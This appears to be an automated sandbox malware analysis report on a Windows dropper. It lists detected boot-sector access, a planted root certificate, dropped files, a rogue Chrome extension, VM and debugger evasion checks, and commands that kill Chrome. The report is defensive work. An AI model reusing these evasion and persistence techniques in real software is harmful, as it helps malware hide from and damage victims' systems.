Source: fnhcdXEfus.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\fnhcdXEfus.exe Unpacked PE file: 0.2.fnhcdXEfus.exe.2810000.5.unpack
Source: C:\Users\user\Desktop\fnhcdXEfus.exe Code function: 0_2_00440314 __EH_prolog3_GS,LoadLibraryW,GetProcAddress,#17,
Source: C:\Users\user\Desktop\fnhcdXEfus.exe Code function: 0_2_004427DD push ecx; ret
Source: C:\Users\user\Desktop\fnhcdXEfus.exe Code function: 0_2_10010579 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe Code function: 3_2_10010579 push ecx; ret
Source: C:\Users\user\AppData\Roaming\1612045890161.exe Code function: 11_2_0040E2F1 push ecx; ret
Source: C:\Users\user\AppData\Roaming\1612045890161.exe Code function: 11_2_0040E340 push eax; ret
Source: C:\Users\user\AppData\Roaming\1612045890161.exe Code function: 11_2_0040E340 push eax; ret
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Code function: 30_2_002B3FB5 push ecx; ret

Persistence and Installation Behavior:

Contains functionality to infect the boot sector
Source: C:\Users\user\Desktop\fnhcdXEfus.exe Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\fnhcdXEfus.exe Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\fnhcdXEfus.exe Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Installs new ROOT certificates
Source: C:\Users\user\Desktop\fnhcdXEfus.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Blob
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe File created: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe File created: C:\Users\user\AppData\Local\Temp\download\download_engine.dll
Source: C:\Users\user\Desktop\fnhcdXEfus.exe File created: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSI6DDB.tmp
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe File created: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe File created: C:\Users\user\AppData\Roaming\1612045890161.exe
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe File created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe File created: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe File created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe File created: C:\Users\user\AppData\Local\Temp\download\zlib1.dll
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe File created: C:\Users\user\AppData\Local\Temp\download\atl71.dll
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe File created: C:\Users\user\AppData\Local\Temp\xldl.dll
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\icon.png
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\icon48.png
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\popup.html
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\background.js
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\book.js
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\jquery-1.8.3.min.js
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\popup.js
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\manifest.json

Boot Survival:

Contains functionality to infect the boot sector
Source: C:\Users\user\Desktop\fnhcdXEfus.exe Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\fnhcdXEfus.exe Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\fnhcdXEfus.exe Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe Code function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe Code function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d
Source: C:\Users\user\Desktop\fnhcdXEfus.exeCode function: 0_2_00445BD3 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Windows\SysWOW64\msiexec.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1612045890161.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\Desktop\fnhcdXEfus.exe Code function: 0_2_100204C0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe Code function: 3_2_100204C0
Uses ping.exe to sleep
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\fnhcdXEfus.exe Code function: 0_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\download_engine.dll
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\zlib1.dll
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\atl71.dll
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xldl.dll
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe Code function: 3_2_100204C0
Source: C:\Users\user\Desktop\fnhcdXEfus.exe Code function: 0_2_100204C0
Source: C:\Users\user\Desktop\fnhcdXEfus.exe TID: 5436 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe TID: 4928 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe TID: 3920 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\fnhcdXEfus.exe File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\fnhcdXEfus.exe Code function: 0_2_0042A5EF __EH_prolog3_GS,_memset,GetTempPathW,FindFirstFileW,CompareFileTime,DeleteFileW,FindNextFileW,
Source: C:\Users\user\Desktop\fnhcdXEfus.exe Code function: 0_2_1001A170 FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe Code function: 3_2_1001A170 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\fnhcdXEfus.exe Code function: 0_2_004594D0 GetModuleHandleW,GetProcAddress,GetSystemInfo,
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284702540.0000000003F37000.00000004.00000001.sdmp Binary or memory string: Microsoft Hyper-V Generation CounterSystemACPI
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.270931402.0000000003F13000.00000004.00000001.sdmp Binary or memory string: Microsoft Hyper-V Generation Counter}V\
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.274136124.00000000007A8000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWZ
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.270931402.0000000003F13000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.274971409.0000000002DED000.00000004.00000001.sdmp Binary or memory string: Microsoft Hyper-V Generation Counter
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.365302511.00000000006E9000.00000004.00000020.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000003.261822382.0000000000799000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.271268505.0000000003EF7000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.273731431.000000000019B000.00000004.00000010.sdmpBinary or memory string: VMware Virtual disk 2.0
Source: ecvB803.tmp.11.drBinary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:472DC600-FEAB-E7F8-720D-1E33F00FD1E7&ctry=US&time=20200930T150347Z&lc=en-US&pl=en-US&idtp=mid&uid=4388269c-b420-4134-ac19-bc7ca8a19ac1&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=4f67defbf95d422b8052c59b06ee26b9&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=663703&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663703&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.273731431.000000000019B000.00000004.00000010.sdmpBinary or memory string: VMware
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.271268505.0000000003EF7000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284726946.0000000003F64000.00000004.00000001.sdmpBinary or memory string: {4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPIxu
Source: C:\Users\user\AppData\Roaming\1612045890161.exeProcess information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10019FF0 GetCurrentProcess,CheckRemoteDebuggerPresent,
Hides threads from debuggers
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Process queried: DebugObjectHandle
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Process queried: DebugFlags
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_0044D67E EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_0044D67E EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00440314 __EH_prolog3_GS,LoadLibraryW,GetProcAddress,#17,
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00446490 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10019DE0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10019E13 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10019E13 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10019ED0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_10019DE0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_10019E13 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_10019E13 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_10019ED0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00419AD9 GetFileSize,GetProcessHeap,HeapAlloc,ReadFile,_strlen,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,ReadFile,GetProcessHeap,HeapFree,
Source: C:\Windows\SysWOW64\taskkill.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_0044A9CB SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_0044A9EE SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10015354 SetUnhandledExceptionFilter,__encode_pointer,
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10015376 __decode_pointer,SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_10015354 SetUnhandledExceptionFilter,__encode_pointer,
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_10015376 __decode_pointer,SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 30_2_002B461F SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 30_2_002B1C57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 30_2_002B373A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 30_2_002B631F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_0043997A __EH_prolog3_GS,_memset,_memset,_memset,_memset,_memset,_memset,InitializeSecurityDescriptor,CreateWellKnownSid,CreateWellKnownSid,CreateWellKnownSid,CreateWellKnownSid,CreateWellKnownSid,CreateWellKnownSid,SetEntriesInAclW,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,SetSecurityDescriptorDacl,CoInitializeSecurity,
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_004403BB __EH_prolog3_GS,GetCurrentThread,OpenThreadToken,GetLastError,GetLastError,GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,
Source: fnhcdXEfus.exe | Binary or memory string: Shell_TrayWnd
Source: fnhcdXEfus.exe | Binary or memory string: AShell_TrayWnd0x0409
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1001779F cpuid
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: GetLocaleInfoW,TranslateCharsetInfo,IsValidLocale,
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: GetLocaleInfoW,
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Queries volume information: C:\ VolumeInformation
